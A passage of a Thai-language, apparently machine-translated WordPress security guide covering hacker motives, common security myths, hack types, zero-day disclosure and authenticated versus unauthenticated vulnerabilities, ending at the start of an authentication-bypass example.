WordPress Security: The Ultimate Guide

ความปลอดภัยของ WordPress อาจเป็นเรื่องที่น่ากลัว แต่ก็ไม่จำเป็น ในคู่มือที่ครอบคลุมเกี่ยวกับความปลอดภัยของ WordPress เราได้ทำให้พื้นฐานการรักษาความปลอดภัยเว็บไซต์ WordPress ของคุณง่ายขึ้น เพื่อให้บุคคลที่ไม่ใช่ผู้เชี่ยวชาญสามารถเข้าใจและปกป้องเว็บไซต์ของตนจากการโจมตีของแฮ็กเกอร์

คู่มือความปลอดภัย WordPress นี้แบ่งออกเป็น 10 ส่วนที่ย่อยง่าย แต่ละส่วนจะแนะนำคุณเกี่ยวกับความปลอดภัยในแง่มุมเฉพาะของ WordPress ในตอนท้ายของคู่มือ คุณจะได้เรียนรู้ช่องโหว่ประเภทต่างๆ แรงจูงใจของแฮกเกอร์ และวิธีรักษาความปลอดภัยทุกอย่างตั้งแต่เซิร์ฟเวอร์ของคุณไปจนถึงผู้ใช้เว็บไซต์ WordPress ของคุณ

มาดำน้ำกันเถอะ!

ส่วนที่ 1: WordPress ปลอดภัยหรือไม่?

WordPress ปลอดภัยหรือไม่? คำตอบสั้น ๆ คือใช่

WordPress มีปัญหาด้านความปลอดภัยหรือไม่?

แม้ว่า WordPress เองจะมีความปลอดภัย แต่การหลีกเลี่ยงข้อผิดพลาดด้านความปลอดภัยของ WordPress นั้นต้องใช้ความพยายามเพียงเล็กน้อยจากเจ้าของเว็บไซต์ ความจริงก็คือปัญหาด้านความปลอดภัยที่ใหญ่ที่สุดของ WordPress คือผู้ใช้ การแฮ็ก WordPress ส่วนใหญ่บนแพลตฟอร์มสามารถหลีกเลี่ยงได้โดยใช้ความพยายามเพียงเล็กน้อยจากเจ้าของไซต์

ไม่ต้องกังวล เรามีคุณครอบคลุม คู่มือนี้จะสอนทุกสิ่งที่คุณจำเป็นต้องรู้เกี่ยวกับการรักษาเว็บไซต์ของคุณให้ปลอดภัย

ก่อนที่เราจะสามารถรักษาความปลอดภัยเว็บไซต์ของเราได้ เราต้องเข้าใจห้าสิ่งก่อน

1. ทำไมแฮกเกอร์โจมตีเว็บไซต์
2. การแฮ็ก WordPress ประเภทต่างๆ
3. ช่องโหว่ WordPress ประเภทเฉพาะ
4. วิธีป้องกันช่องโหว่ WordPress
5. วิธีการกำหนดความรุนแรงของช่องโหว่

เหตุใดแฮ็กเกอร์จึงโจมตีเว็บไซต์ของฉัน

นี่เป็นคำถามทั่วไปเกี่ยวกับความปลอดภัยของ WordPress ที่คุณอาจถามเมื่อฝันร้ายที่เลวร้ายที่สุดของคุณเริ่มเป็นจริง เหตุใดแฮ็กเกอร์จึงโจมตีเว็บไซต์ของฉัน วางใจได้เลย โอกาสที่การโจมตีจะเป็นแบบส่วนตัวนั้นน้อยมาก แฮกเกอร์มีแรงจูงใจพื้นฐานที่ไม่เกี่ยวข้องกับเนื้อหาในเว็บไซต์ของคุณ โดยทั่วไปแล้วแฮ็กเกอร์ไม่สนใจว่าเว็บไซต์ของคุณจะเป็นหน้าการกุศลสำหรับลูกสุนัขจรจัดหรือเว็บไซต์ที่มีสินค้าเจ๋งๆ มากมายขาย

อย่างไรก็ตาม เป็นการยากที่จะไม่รู้สึกตกเป็นเป้าหมายเมื่อตัวตนที่ไม่มีตัวตนถูกแฮ็กเข้าสู่เว็บไซต์ของคุณ ทำให้เกิดความโกลาหลและความวุ่นวาย คุณรู้สึกเครียดและชอบสถานการณ์ที่หมุนออกจากการควบคุมของคุณ คุณรู้สึกถูกโจมตีเป็นการส่วนตัวและสงสัยว่ามีวิธีหยุดการโจมตีหรือไม่ คุณอาจสงสัยว่ามีการกอบกู้ซากปรักหักพังที่เป็นเว็บไซต์ของคุณหรือไม่

อะไรที่ทำให้แฮ็กเกอร์กำหนดเป้าหมายเว็บไซต์ ไม่มีส่วนเกี่ยวข้องกับเว็บไซต์ของคุณ หัวข้อที่ครอบคลุมหรืออะไรทำนองนั้น ในความเป็นจริง แฮกเกอร์กำหนดเป้าหมายซอฟต์แวร์ที่เว็บไซต์ของคุณใช้เพื่อติดตามและทำงานต่อไป การแฮ็คเข้าสู่ซอฟต์แวร์นี้ พวกเขาสามารถขโมยข้อมูลลูกค้าที่ละเอียดอ่อนหรือแม้แต่ควบคุมเว็บไซต์ WordPress ของคุณได้

น่าเสียดายที่ WordPress กลายเป็นเป้าหมายของแฮกเกอร์ด้วยความนิยมที่เพิ่มขึ้น หากปลั๊กอิน WordPress ยอดนิยมมีช่องโหว่ร้ายแรง แฮ็กเกอร์อาจมีพิมพ์เขียวที่จะเข้ายึดครองเว็บไซต์หลายแสนเว็บไซต์ โชคดีที่ช่องโหว่ของปลั๊กอินส่วนใหญ่ได้รับการแก้ไขอย่างรวดเร็วโดยนักพัฒนา

แฮ็กเกอร์สามารถขายข้อมูลดังกล่าวเพื่อหารายได้หรือแม้แต่เก็บค่าไถ่ข้อมูล โดยหลักแล้วทำให้ผู้คนจ่ายเงินเพื่อรับข้อมูลกลับคืนสู่มืออย่างปลอดภัย

อะไรคือแรงจูงใจหลักของแฮกเกอร์?

เพื่อสร้างกระแสเงินสดให้ตัวเอง

อินเทอร์เน็ตเป็นสถานที่ที่ร่ำรวยที่เปิดโอกาสให้ทุกสาขาอาชีพสร้างค่าครองชีพ อย่างไรก็ตาม นั่นไม่ได้หมายความว่าทุกคนจะดำเนินเรื่องนี้อย่างถูกกฎหมายและมีศีลธรรม แฮกเกอร์ทำกำไรได้สูงจากเว็บไซต์ที่เล็กที่สุด

เงินคือแรงจูงใจทั้งหมดที่พวกเขาต้องการ แต่บางคนก็รู้สึกได้ถึงพลังที่พวกเขาได้รับเมื่อประสบความสำเร็จในการฝ่าฝืนเว็บไซต์ แต่ส่วนใหญ่อยู่ในธุรกิจเพื่อเงินสดเท่านั้น

ส่วนที่ 2: ตำนานความปลอดภัย 5 อันดับแรกของ WordPress ถูกเปิดเผย

ก่อนที่เราจะเข้าสู่ส่วนอื่นๆ ของคู่มือการรักษาความปลอดภัยของ WordPress นี้ เรามาใช้เวลาสักครู่เพื่อลบล้างตำนานด้านความปลอดภัยของ WordPress บางส่วน

คุณจะพบคำแนะนำด้านความปลอดภัยของ WordPress มากมายที่ลอยอยู่บนอินเทอร์เน็ตจากผู้ที่มีเจตนาดีที่ต้องการความช่วยเหลืออย่างแท้จริง ขออภัย คำแนะนำนี้บางส่วนสร้างขึ้นจากตำนานด้านความปลอดภัยของ WordPress และไม่ได้เพิ่มการรักษาความปลอดภัยใดๆ เพิ่มเติมให้กับเว็บไซต์ WordPress ของคุณ อันที่จริง “เคล็ดลับ” ด้านความปลอดภัยของ WordPress บางส่วนอาจเพิ่มโอกาสที่คุณจะพบปัญหาและข้อขัดแย้ง

เรามีตำนานด้านความปลอดภัยของ WordPress ให้เลือกมากมาย แต่เราจะเน้นเฉพาะ 5 อันดับแรกที่เราพบเห็นอย่างสม่ำเสมอในตั๋วสนับสนุนมากกว่า 30,000 ใบ การสนทนาเหล่านี้กับลูกค้าของเราถูกใช้เป็นพื้นฐานสำหรับเกณฑ์ต่อไปนี้เพื่อเลือกตำนานด้านความปลอดภัย WordPress อันดับต้น ๆ:

1. ความถี่ที่ตำนานถูกกล่าวถึง
2. จำนวนอาการปวดหัวที่เกิดจากตำนาน
3. ความรู้สึกผิด ๆ เกี่ยวกับความปลอดภัยที่ตำนานกล่าวไว้

1. คุณควรซ่อน /wp-admin หรือ /wp-login URL ของคุณ (เรียกอีกอย่างว่าซ่อนแบ็กเอนด์)

แนวคิดเบื้องหลังการซ่อน wp-admin คือแฮกเกอร์ไม่สามารถแฮ็คสิ่งที่พวกเขาหาไม่พบ หาก URL เข้าสู่ระบบของคุณไม่ใช่ URL มาตรฐานของ WordPress /wp-admin/ คุณไม่ได้รับการปกป้องจากการโจมตีด้วยกำลังเดรัจฉานใช่หรือไม่

ความจริงก็คือฟีเจอร์ Hide Backend ส่วนใหญ่จะเป็นการรักษาความปลอดภัยผ่านความสับสน ซึ่งไม่ใช่กลยุทธ์การรักษาความปลอดภัย WordPress แบบกันกระสุน แม้ว่าการซ่อน URL ผู้ดูแลระบบ wp-admin ของแบ็กเอนด์สามารถช่วยลดการโจมตีบางอย่างในการเข้าสู่ระบบของคุณได้ แต่วิธีนี้ไม่ได้หยุดการโจมตีทั้งหมด

เรามักได้รับตั๋วสนับสนุนจากผู้ที่สับสนว่า iThemes Security Pro รายงานว่ามีการพยายามเข้าสู่ระบบที่ไม่ถูกต้องอย่างไร เมื่อพวกเขาซ่อนข้อมูลการเข้าสู่ระบบไว้ นั่นเป็นเพราะว่ามีวิธีอื่นในการลงชื่อเข้าใช้ไซต์ WordPress ของคุณนอกเหนือจากการใช้เบราว์เซอร์ เช่น การใช้ XML-RPC หรือ REST API ไม่ต้องพูดถึงหลังจากเปลี่ยน URL สำหรับเข้าสู่ระบบ ปลั๊กอินหรือธีมอื่นยังสามารถเชื่อมโยงไปยัง URL ใหม่ได้

อันที่จริง คุณลักษณะซ่อนแบ็กเอนด์ไม่ได้เปลี่ยนแปลงอะไรจริงๆ ใช่ มันป้องกันผู้ใช้ส่วนใหญ่ไม่ให้เข้าถึง URL เริ่มต้นการเข้าสู่ระบบโดยตรง แต่หลังจากที่มีคนป้อน URL ล็อกอินที่กำหนดเอง พวกเขาจะถูกเปลี่ยนเส้นทางกลับไปที่ URL ล็อกอินของ WordPress เริ่มต้น

การปรับแต่ง URL ล็อกอินยังทำให้เกิดข้อขัดแย้งอีกด้วย มีปลั๊กอิน ธีม หรือแอปของบุคคลที่สามบางตัวที่ฮาร์ดโค้ด wp-login.php ลงในฐานโค้ด ดังนั้นเมื่อซอฟต์แวร์ฮาร์ดโค้ดกำลังมองหา yoursite.com/wp-login.php จะพบข้อผิดพลาดแทน

2. คุณควรซ่อนชื่อธีมและหมายเลขเวอร์ชันของ WordPress

หากคุณใช้เครื่องมือสำหรับนักพัฒนาซอฟต์แวร์ของเบราว์เซอร์ คุณจะเห็นชื่อธีมและหมายเลขเวอร์ชันของ WordPress ที่ทำงานบนไซต์ WordPress ได้อย่างรวดเร็ว ทฤษฎีเบื้องหลังการซ่อนชื่อธีมและเวอร์ชัน WP ของคุณคือ หากผู้โจมตีมีข้อมูลนี้ พวกเขาจะมีพิมพ์เขียวเพื่อเจาะเข้าไปในไซต์ของคุณ

ตัวอย่างเช่น เมื่อดูภาพหน้าจอด้านบน คุณจะเห็นว่าไซต์นี้ใช้ Twenty Twenty-One และ WordPress เวอร์ชัน 5.6

ปัญหาของตำนานด้านความปลอดภัยของ WordPress นี้คือไม่มีใครอยู่หลังคีย์บอร์ดที่กำลังมองหาการผสมผสานที่ลงตัวระหว่างธีมและหมายเลขเวอร์ชันของ WordPress เพื่อโจมตี อย่างไรก็ตาม มีบอทที่ไม่สนใจอินเทอร์เน็ตเพื่อค้นหาช่องโหว่ที่ทราบในโค้ดจริงที่ทำงานบนเว็บไซต์ของคุณ ดังนั้นการซ่อนชื่อธีมและหมายเลขเวอร์ชัน WP จะไม่ปกป้องคุณ

3. คุณควรเปลี่ยนชื่อไดเรกทอรีเนื้อหา wp ของคุณ

ไดเร็กทอรี wp-content ประกอบด้วยโฟลเดอร์ปลั๊กอิน ธีม และสื่อที่อัปโหลด นั่นเป็นสิ่งที่ดีมากมายและโค้ดสั่งการได้ทั้งหมดในไดเร็กทอรีเดียว จึงเป็นที่เข้าใจได้ว่าผู้คนต้องการเป็นเชิงรุกและรักษาความปลอดภัยให้กับโฟลเดอร์นี้

ขออภัย เป็นตำนานด้านความปลอดภัยของ WordPress ที่การเปลี่ยนชื่อเนื้อหา wp จะเพิ่มการรักษาความปลอดภัยอีกชั้นหนึ่งให้กับไซต์ มันจะไม่ เราสามารถค้นหาชื่อไดเร็กทอรี wp-content ที่คุณเปลี่ยนได้อย่างง่ายดายโดยใช้เครื่องมือสำหรับนักพัฒนาเบราว์เซอร์ ในภาพหน้าจอด้านล่าง เราจะเห็นว่าฉันได้เปลี่ยนชื่อไดเร็กทอรีเนื้อหาของไซต์นี้เป็น /test/

การเปลี่ยนชื่อไดเร็กทอรีจะไม่เพิ่มการรักษาความปลอดภัยใดๆ ให้กับไซต์ของคุณ แต่อาจทำให้เกิดข้อขัดแย้งสำหรับปลั๊กอินที่มีเส้นทางไดเร็กทอรี /wp-content/ ฮาร์ดโค้ด

4. เว็บไซต์ของฉันไม่ใหญ่พอที่จะได้รับความสนใจจากแฮกเกอร์

ตำนานด้านความปลอดภัยของ WordPress นี้ทำให้ไซต์จำนวนมากเสี่ยงต่อการถูกโจมตี แม้ว่าคุณจะเป็นเจ้าของไซต์ขนาดเล็กที่มีการเข้าชมต่ำ แต่ก็ยังเป็นสิ่งสำคัญที่คุณจะต้องดำเนินการในเชิงรุกในการรักษาความปลอดภัยให้กับเว็บไซต์ของคุณ

แม้ว่าคุณจะเป็นเจ้าของไซต์ขนาดเล็กที่มีการเข้าชมต่ำ แต่ก็ยังเป็นสิ่งสำคัญที่คุณจะต้องดำเนินการในเชิงรุกในการรักษาความปลอดภัยให้กับเว็บไซต์ของคุณ

ความจริงก็คือไซต์หรือธุรกิจของคุณไม่จำเป็นต้องใหญ่โตเพื่อให้ได้รับความสนใจจากผู้โจมตี แฮกเกอร์ยังคงมองเห็นโอกาสในการใช้ไซต์ของคุณเป็นสื่อกลางในการเปลี่ยนเส้นทางผู้เยี่ยมชมบางส่วนไปยังไซต์ที่เป็นอันตราย ส่งสแปมจากเซิร์ฟเวอร์อีเมลของคุณ แพร่ไวรัส หรือแม้แต่ขุด Bitcoin พวกเขาจะเอาทุกอย่างที่หามาได้

5. WordPress เป็นแพลตฟอร์มที่ไม่ปลอดภัย

ตำนานด้านความปลอดภัยของ WordPress ที่สร้างความเสียหายมากที่สุดคือ WordPress เองนั้นไม่ปลอดภัย นี้เป็นเพียงไม่เป็นความจริง. WordPress เป็นระบบจัดการเนื้อหาที่ได้รับความนิยมมากที่สุดในโลก และมันก็ไม่ได้เป็นเช่นนั้นโดยไม่ได้คำนึงถึงความปลอดภัยอย่างจริงจัง

ส่วนที่ 3: WordPress Hacks & WordPress Vulnerabilities

WordPress Hacks 4 ประเภท

เมื่อพูดถึงการทำความเข้าใจความปลอดภัยของ WordPress สิ่งสำคัญคือต้องเข้าใจ

1. SEO สแปม

แรงจูงใจอีกประการหนึ่งสำหรับแฮ็กเกอร์ในการโจมตีเว็บไซต์ของคุณคือการได้รับประโยชน์จากสแปม SEO SEO หรือการเพิ่มประสิทธิภาพกลไกค้นหาคือสิ่งที่เสิร์ชเอ็นจิ้นใช้ในการจัดทำดัชนีหรือจัดอันดับเว็บไซต์ของคุณ การใช้คำหลักบางคำที่วางอยู่ในหน้าเว็บและบทความในบล็อกของคุณอย่างมีกลยุทธ์ จะช่วยให้เว็บไซต์ของคุณมีอันดับสูงขึ้นในการค้นหาของ Google การทำเช่นนี้จะช่วยเพิ่มปริมาณการเข้าชมเว็บไซต์ของคุณและช่วยให้คุณสร้างผลกำไรที่คุ้มค่าแก่เวลาของคุณ

แฮกเกอร์รู้ทุกอย่างเกี่ยวกับ SEO และพวกเขาใช้มันเพื่อประโยชน์ของตน เมื่อเว็บไซต์ของคุณถูกบุกรุก แฮกเกอร์จะติดตั้งแบ็คดอร์ลงในเว็บไซต์ของคุณ ซึ่งช่วยให้ควบคุมคำหลักและเนื้อหาเว็บไซต์ได้จากระยะไกล พวกเขามักจะเปลี่ยนเส้นทางการรับส่งข้อมูลจากเว็บไซต์ของคุณ ส่งผ่านไปยังพวกเขาโดยตรง และส่งต่อการเข้าชมของคุณโดยสมบูรณ์

ซึ่งจะทำให้กลุ่มเป้าหมายของคุณสับสนและหงุดหงิด ทำลายชื่อเสียงและความน่าเชื่อถือของเว็บไซต์ของคุณ ผู้เยี่ยมชมเว็บไซต์ของคุณมักจะถูกเปลี่ยนเส้นทางไปยังเว็บไซต์ที่เห็นได้ชัดว่าเป็นการหลอกลวง และพวกเขาจะลังเลที่จะกลับมาเยี่ยมชมเว็บไซต์ของคุณอีกในอนาคต

ราวกับว่านั่นยังไม่ดีพอ แฮกเกอร์ที่ใช้วิธีนี้ทำให้เว็บไซต์ของคุณดูแย่สำหรับเสิร์ชเอ็นจิ้น ไม่ใช่แค่เพื่อนมนุษย์เท่านั้น เว็บไซต์ของคุณจะดูไม่เหมาะสมอีกต่อไป และอันดับของเว็บไซต์จะลดลงอย่างรวดเร็ว หากไม่มีการจัดอันดับที่สูงในการค้นหา ไซต์ของคุณจะกลายเป็นหนึ่งในล้านที่ไม่เคยได้รับความนิยมมากกว่าสองสามครั้งต่อเดือน

2. การฉีดมัลแวร์

แฮกเกอร์จำนวนมากโจมตีเว็บไซต์ของคุณโดยตั้งใจจะติดมัลแวร์ มัลแวร์คือโค้ดเล็กๆ น้อยๆ ที่สามารถใช้ทำการเปลี่ยนแปลงที่เป็นอันตรายบนเว็บไซต์ของคุณได้ หากไซต์ของคุณติดมัลแวร์ จำเป็นต้องได้รับการแจ้งเตือนโดยเร็วที่สุด

ทุกนาทีที่มัลแวร์ยังคงอยู่บนเว็บไซต์ของคุณ มันกำลังสร้างความเสียหายให้กับเว็บไซต์ของคุณมากขึ้น ยิ่งเกิดความเสียหายกับเว็บไซต์ของคุณมากเท่าใด คุณก็ยิ่งต้องทำความสะอาดและกู้คืนเว็บไซต์ของคุณนานขึ้นเท่านั้น การตรวจสอบความสมบูรณ์ของเว็บไซต์ของคุณเป็นสิ่งสำคัญโดยการสแกนหามัลแวร์เป็นประจำ นี่คือเหตุผลสำคัญที่ต้องตรวจสอบความสมบูรณ์ของเว็บไซต์ของคุณอย่างต่อเนื่องโดยการสแกนหามัลแวร์

3. แรนซัมแวร์

แฮ็กเกอร์อาจต้องการโจมตีเว็บไซต์ของคุณเพื่อเรียกค่าไถ่ Ransomware หมายถึงเมื่อแฮ็กเกอร์เข้ายึดเว็บไซต์ของคุณจะไม่ปล่อยมันคืนให้คุณเว้นแต่คุณจะจ่ายค่าธรรมเนียมจำนวนมากให้พวกเขา เวลาหยุดทำงานโดยเฉลี่ยของการโจมตีด้วยแรนซัมแวร์คือ 9.5 วัน รายได้ 10 วันของการขาย NO มีค่าใช้จ่ายเท่าไร?

ค่าไถ่เฉลี่ยที่แฮ็กเกอร์ร้องขอเพิ่มขึ้นอย่างมากจาก $294 ในปี 2015 เป็นมากกว่า $13,000 ในปี 2020 ด้วยการจ่ายเงินประเภทนี้ ธุรกิจอาชญากรรมออนไลน์จะไม่ชะลอตัวลง การรักษาความปลอดภัยและปกป้องเว็บไซต์ของคุณอย่างเหมาะสมมีความสำคัญมากขึ้นเรื่อยๆ เมื่อชุมชนอาชญากรรมเช่นนี้เติบโตขึ้น

4. เว็บไซต์ Defacement

แฮกเกอร์บางคนอาจโจมตีเว็บไซต์ของคุณเพื่อความสนุกเล็กน้อย รูปแบบการแฮ็กที่มีความชั่วร้ายน้อยกว่าคือรูปแบบการแฮ็กเว็บไซต์ โดยทั่วไปแล้วสิ่งเหล่านี้คือเด็กหรือผู้ใหญ่วัยหนุ่มสาวเพิ่งเริ่มเล่นทักษะการแฮ็ก พวกเขาทำการแฮ็กแบบนี้เพื่อฝึกฝนและพัฒนาทักษะของพวกเขา

เมื่อเราพูดถึงเว็บไซต์ที่ถูกลบล้าง ให้นึกถึงภาพกราฟฟิตี้ ผู้โจมตีจะเปลี่ยนรูปลักษณ์เว็บไซต์ของคุณโดยสิ้นเชิง บางครั้งในลักษณะที่สนุกสนานหรือแปลกประหลาด ผู้ทำลายล้างเว็บไซต์ทั่วไปกำลังทำเพื่อความสนุกหรือเพื่ออวด พวกเขามักจะโพสต์ภาพการกระทำผิดของพวกเขา พยายามรวมกลุ่มกันเพื่อชิงรางวัลการเสียหน้าที่ดีที่สุด

ข่าวดีก็คือ การแฮ็กรูปแบบนี้ไม่อันตรายสำหรับคุณที่จะสัมผัส นอกจากนี้ เนื่องจากส่วนใหญ่เป็นวัยรุ่นและแฮ็กเกอร์มือสมัครเล่นคนอื่นๆ ที่ทำการดีเฟซ พวกเขาจะตรวจจับและนำออกจากเว็บไซต์ของคุณได้ง่ายกว่าเมื่อเทียบกับมัลแวร์รูปแบบอื่นๆ โดยปกติแล้วเครื่องสแกนจะตรวจพบและนำออกได้อย่างรวดเร็ว

อธิบายช่องโหว่ทั่วไปของ WordPress 21 รายการ

ขออภัย มีช่องโหว่ของ WordPress ช่องโหว่ของ WordPress อาจมีอยู่ในปลั๊กอิน ธีมของคุณ และแม้แต่แกนหลักของ WordPress และเนื่องจากตอนนี้ WordPress มีอำนาจเกือบ 40% ของเว็บไซต์ทั้งหมด งานในการทำความเข้าใจช่องโหว่จึงมีความสำคัญมากขึ้น พูดง่ายๆ ก็คือ คุณต้องระมัดระวังเกี่ยวกับความปลอดภัยของเว็บไซต์ของคุณ

หากคุณไม่ใช่ผู้เชี่ยวชาญด้านความปลอดภัยของ WordPress การทำความเข้าใจช่องโหว่ต่างๆ ของ WordPress อาจเป็นเรื่องที่น่ากลัว การพยายามทำความเข้าใจระดับความรุนแรงของช่องโหว่ต่างๆ ควบคู่ไปกับความเสี่ยงของช่องโหว่ของ WordPress อาจเป็นเรื่องที่ยากเกินไป

คู่มือนี้จะกำหนดช่องโหว่ที่พบบ่อยที่สุด 21 ประการของ WordPress ครอบคลุมวิธีการให้คะแนนความรุนแรงของช่องโหว่ของ WordPress ให้ตัวอย่างว่าแฮ็กเกอร์สามารถใช้ประโยชน์จากช่องโหว่ได้อย่างไร และแสดงให้เห็นว่าสามารถป้องกันช่องโหว่เหล่านี้ได้อย่างไร มาดำน้ำกันเถอะ

ช่องโหว่ WordPress คืออะไร?

ช่องโหว่ของ WordPress เป็นจุดอ่อนหรือข้อบกพร่องในธีม ปลั๊กอิน หรือแกนหลักของ WordPress ที่แฮ็กเกอร์สามารถใช้ประโยชน์ได้ กล่าวอีกนัยหนึ่ง ช่องโหว่ของ WordPress สร้างจุดเริ่มต้นที่แฮ็กเกอร์สามารถใช้เพื่อดึงกิจกรรมที่เป็นอันตราย

โปรดทราบว่าการแฮ็กเว็บไซต์เกือบทั้งหมดเป็นแบบอัตโนมัติ ด้วยเหตุนี้ แฮกเกอร์จึงสามารถเจาะเข้าไปในเว็บไซต์จำนวนมากได้อย่างง่ายดายโดยแทบไม่มีเวลาเลย แฮกเกอร์ใช้เครื่องมือพิเศษที่สแกนอินเทอร์เน็ตเพื่อค้นหาช่องโหว่ที่ทราบ

แฮ็กเกอร์ชอบเป้าหมายที่ง่าย และการมีเว็บไซต์ที่ใช้งานซอฟต์แวร์ที่มีช่องโหว่ที่รู้จักก็เหมือนกับการให้คำแนะนำทีละขั้นตอนแก่แฮ็กเกอร์เพื่อเจาะเข้าไปในเว็บไซต์ WordPress เซิร์ฟเวอร์ คอมพิวเตอร์ หรืออุปกรณ์ที่เชื่อมต่ออินเทอร์เน็ตอื่นๆ

รายงานสรุปช่องโหว่ของ WordPress ประจำเดือนของเราครอบคลุมถึงแกน WordPress ที่เปิดเผยต่อสาธารณะ ปลั๊กอิน WordPress และช่องโหว่ของธีม ในบทสรุปนี้ เราแชร์ชื่อปลั๊กอินหรือธีมที่มีช่องโหว่ เวอร์ชันที่ได้รับผลกระทบ และประเภทช่องโหว่

ช่องโหว่ Zero-Day คืออะไร?

เมื่อพูดถึงความปลอดภัยของ WordPress สิ่งสำคัญคือต้องเข้าใจคำจำกัดความของช่องโหว่ซีโร่เดย์ เนื่องจากช่องโหว่ดังกล่าวถูกเปิดเผยต่อสาธารณะ นักพัฒนาจึงมีเวลา 0 วัน ในการแก้ไขช่องโหว่ และอาจส่งผลอย่างมากต่อปลั๊กอินและธีมของคุณ

โดยปกติ นักวิจัยด้านความปลอดภัยจะค้นพบช่องโหว่และเปิดเผยช่องโหว่ดังกล่าวแบบส่วนตัวต่อนักพัฒนาของบริษัทที่เป็นเจ้าของซอฟต์แวร์ นักวิจัยด้านความปลอดภัยและนักพัฒนายอมรับว่ารายละเอียดทั้งหมดจะถูกเผยแพร่เมื่อแพทช์พร้อมใช้งานแล้ว อาจมีความล่าช้าเล็กน้อยในการเปิดเผยช่องโหว่หลังจากออกแพตช์เพื่อให้ผู้คนมีเวลามากขึ้นในการอัปเดตช่องโหว่ด้านความปลอดภัยที่สำคัญ

อย่างไรก็ตาม หากนักพัฒนาไม่ตอบสนองต่อนักวิจัยด้านความปลอดภัยหรือไม่สามารถจัดหาโปรแกรมแก้ไขสำหรับช่องโหว่ ผู้วิจัยอาจเปิดเผยช่องโหว่ต่อสาธารณะเพื่อกดดันนักพัฒนาให้ออกโปรแกรมแก้ไข

การเปิดเผยช่องโหว่ในที่สาธารณะและดูเหมือนว่าการเปิดตัวซีโร่เดย์อาจดูเหมือนเป็นการต่อต้าน แต่เป็นการใช้ประโยชน์เพียงอย่างเดียวที่นักวิจัยต้องกดดันนักพัฒนาให้แก้ไขช่องโหว่

Project Zero ของ Google มีแนวทางที่คล้ายกันในการเปิดเผยช่องโหว่ พวกเขาเผยแพร่รายละเอียดทั้งหมดของช่องโหว่หลังจาก 90 วัน ช่องโหว่นั้นได้รับการแก้ไขแล้วหรือไม่

ช่องโหว่มีให้ทุกคนค้นหา หากแฮ็กเกอร์พบช่องโหว่ก่อนที่นักพัฒนาซอฟต์แวร์จะเผยแพร่แพตช์ มันจะกลายเป็นฝันร้ายที่สุดสำหรับผู้ใช้ปลายทาง…. Zero-day ที่เอาเปรียบอย่างแข็งขัน

ช่องโหว่ Zero-Day ที่ถูกเอารัดเอาเปรียบอย่างแข็งขันคืออะไร?

ช่องโหว่ Zero-Day ที่ถูกเอารัดเอาเปรียบอย่างแข็งขัน เป็นสิ่งที่ดูเหมือน เป็นช่องโหว่ที่ไม่ได้รับการแก้ไขซึ่งแฮ็กเกอร์กำลังกำหนดเป้าหมาย โจมตี และแสวงหาประโยชน์อย่างแข็งขัน

ในตอนท้ายของปี 2018 แฮกเกอร์ใช้ประโยชน์จากช่องโหว่ของ WordPress อย่างแข็งขันในปลั๊กอิน WP GDPR Compliance ช่องโหว่นี้อนุญาตให้ผู้ใช้ที่ไม่ได้รับอนุญาต—เพิ่มเติมเกี่ยวกับเรื่องนี้ในหัวข้อถัดไป—เพื่อแก้ไขการตั้งค่าการลงทะเบียนผู้ใช้ WP และเปลี่ยนบทบาทผู้ใช้เริ่มต้นใหม่จากผู้สมัครสมาชิกเป็นผู้ดูแลระบบ

แฮกเกอร์เหล่านี้พบช่องโหว่นี้ก่อนปลั๊กอิน WP GDPR และนักวิจัยด้านความปลอดภัย ดังนั้นเว็บไซต์ใดๆ ที่ติดตั้งปลั๊กอินจึงเป็นเครื่องหมายที่ง่ายและรับประกันสำหรับอาชญากรไซเบอร์

วิธีป้องกันตัวเองจากช่องโหว่ Zero-Day

วิธีที่ดีที่สุดในการปกป้องเว็บไซต์ของคุณจากช่องโหว่ Zero-Day คือการปิดใช้งานและนำซอฟต์แวร์ออกจนกว่าช่องโหว่นั้นจะถูกแก้ไข โชคดีที่ผู้พัฒนาปลั๊กอินการปฏิบัติตามข้อกำหนด WP GDPR ดำเนินการอย่างรวดเร็วและออกแพตช์สำหรับช่องโหว่ในวันรุ่งขึ้นหลังจากที่เปิดเผยต่อสาธารณะ

ช่องโหว่ที่ไม่ได้รับการแก้ไขทำให้เว็บไซต์ของคุณเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์

Unauthenticated vs. Authenticated WordPress ช่องโหว่

มีคำศัพท์อีกสองคำที่คุณต้องคุ้นเคยเมื่อพูดถึงช่องโหว่ของ WordPress

1. Unauthenticated – ช่องโหว่ WordPress ที่ไม่ผ่านการ ตรวจสอบสิทธิ์ หมายความว่าใครก็ตามสามารถใช้ประโยชน์จากช่องโหว่นี้ได้
2. รับรองความถูกต้อง – ช่องโหว่ WordPress ที่ผ่านการตรวจสอบความถูกต้องหมายความว่าผู้ใช้ที่ลงชื่อเข้าใช้เพื่อใช้ประโยชน์

ช่องโหว่ที่ต้องใช้ผู้ใช้ที่ผ่านการตรวจสอบสิทธิ์นั้นยากกว่ามากสำหรับแฮ็กเกอร์ที่จะหาช่องโหว่ โดยเฉพาะอย่างยิ่งหากต้องใช้สิทธิ์ระดับผู้ดูแลระบบ และหากแฮ็กเกอร์มีชุดข้อมูลประจำตัวของผู้ดูแลระบบอยู่แล้ว พวกเขาก็ไม่จำเป็นต้องใช้ประโยชน์จากช่องโหว่เพื่อสร้างความหายนะ

มีข้อแม้ประการหนึ่ง ช่องโหว่ที่ได้รับการตรวจสอบสิทธิ์บางอย่างต้องการความสามารถระดับสมาชิกเท่านั้นจึงจะสามารถใช้ประโยชน์ได้ หากเว็บไซต์ของคุณอนุญาตให้ใครก็ตามลงทะเบียนได้ ก็ไม่มีอะไรแตกต่างกันมากนักระหว่างช่องโหว่นี้กับช่องโหว่ที่ไม่ผ่านการตรวจสอบสิทธิ์

เมื่อพูดถึงช่องโหว่ของ WordPress มีช่องโหว่ทั่วไป 21 ประเภท มาพูดถึงช่องโหว่ของ WordPress แต่ละประเภทกัน

1. บายพาสการตรวจสอบสิทธิ์

ช่องโหว่ Authentication Bypass ช่วยให้ผู้โจมตีสามารถข้ามข้อกำหนดการตรวจสอบสิทธิ์และทำงานที่สงวนไว้สำหรับผู้ใช้ที่ได้รับการพิสูจน์ตัวตนตามปกติ

การรับรองความถูกต้องเป็นกระบวนการยืนยันตัวตนของผู้ใช้ WordPress กำหนดให้ผู้ใช้ป้อนชื่อผู้ใช้และรหัสผ่านเพื่อยืนยันตัวตน

ตัวอย่างบายพาสการตรวจสอบสิทธิ์

